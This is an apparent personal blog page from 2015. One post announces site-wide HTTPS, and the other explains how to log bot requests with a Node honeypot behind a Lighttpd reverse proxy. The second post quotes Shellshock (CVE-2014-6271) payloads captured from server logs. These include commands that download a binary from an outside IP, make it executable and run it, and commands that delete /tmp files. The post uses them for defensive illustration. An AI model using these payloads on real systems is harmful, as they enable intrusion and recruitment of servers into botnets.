Wednesday, April 29, 2015

Full site HTTPS is here!


Now you can browse all of these silly pages securely, without fear of certain government agencies discovering your appreciation for Nicolas Cage!

Check out my SSL test ratings (All A+s!):

Wednesday, April 22, 2015

Catching Spam Bots In the Act with Node

Have you ever been searching through your webserver's logs and noticed Chinese IP's making nasty looking requests like


    GET /cgi-bin/bash HTTP/1.1
    GET /cgi-bin/php HTTP/1.1
    GET /rom-0 HTTP/1.1


    () { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget -O /tmp/;curl -O /tmp/;perl /tmp/;rm -rf /tmp/*\");'"

Or even _this_?

    () { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://123.456.7.8:911/java -O /tmp/China.Z-rmeo >> /tmp/;echo echo By China.Z >> /tmp/;echo chmod 777 /tmp/China.Z-rmeo >> /tmp/;echo /tmp/China.Z-rmeo >> /tmp/;echo rm -rf /tmp/ >> /tmp/;chmod 777 /tmp/;/tmp/\"

Though most current web servers are immune to these simple attacks (assuming, of course, that you've been keeping your packages updated), it's often interesting to see how bots attempt to exploit vulnerable services running on web servers. 
In some cases, such as the log excerpts above, it's easy to see how this is achieved. The user-agent is crafted to exploit CVE-2014-6271 (AKA Shellshock), which results in some commands being run that turn our precious server into a mindless zombie :(
However, in other cases, this information is not as apparent. The default logging configuration for most web servers doesn't include other data which could potentially be used as an attack vector, such as HTTP headers!
Therefore, we'll have to write our own script to collect this data from such nasty requests and log it. 
You'll need to either create a script that listens to HTTP requests and writes all those juicy details to a log file in whatever language you like (Python, PHP, Ruby, even a Perl CGI script), or find one out on the net somewhere. I'm just going to reuse one of my old projects for this, which just so happens to be written in Node. Here's the adapted version.

If you do decide to write your own script, make sure that it does the following:
  1. Accepts all incoming HTTP connections.
  2. Logs the details of those connections to a file. 
  3. Returns 200 as the response code (You attract more bots with honey than with vinegar, so make the request appear to work).
  4. Is watertight and ready to face the incoming nastiness (wouldn't want to inadvertently become a part of the botnet :P)
You may also want to find out some URLs that these bots seem to check regularly, because we'll need those later for our web server configuration, but I will have some examples in this post. 
I'm going to set this up on my auxiliary server, which also sits in a "residential" IP space and gets a fair amount of these bots as result. 
On to the configuration.
In your web server's configuration, set up a reverse proxy to whatever port your script is listening for requests on.

Here's one of mine (I run Lighttpd):
$HTTP["url"] == "/cgi-bin/test.cgi" {
proxy.server = ( "" => ( (
        "host" => "",
        "port" => 8082 ) ) )
Pretty straightforward. We take all requests for /cgi-bin/test.cgi and proxy them to our script, which in this case is running on port 8082 on the local machine. 
Apply the configuration and use your favorite command line utility to make a request to your shiny new reverse proxy.
Here's an example output from mine:
    "fi_timeStamp": "2015:04:22:06:01:55",
    "fi_requestIP": "",
    "fi_method": "GET",
    "req_headers": {
        "accept": "text/html, application/xhtml+xml, */*",
        "user-agent": "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)",
        "host": "123.456.7.8:80",
        "authorization": "Basic Og==",
        "x-forwarded-for": "432.10.54.21",
        "x-host": "123.456.7.8:80",
        "x-forwarded-proto": "http"
Once everything is working, just sit back, relax, and keep an eye on your logs :)
UPDATE: I'll be working to keep an active list of spammer IPs available. I'll post another update when it's up.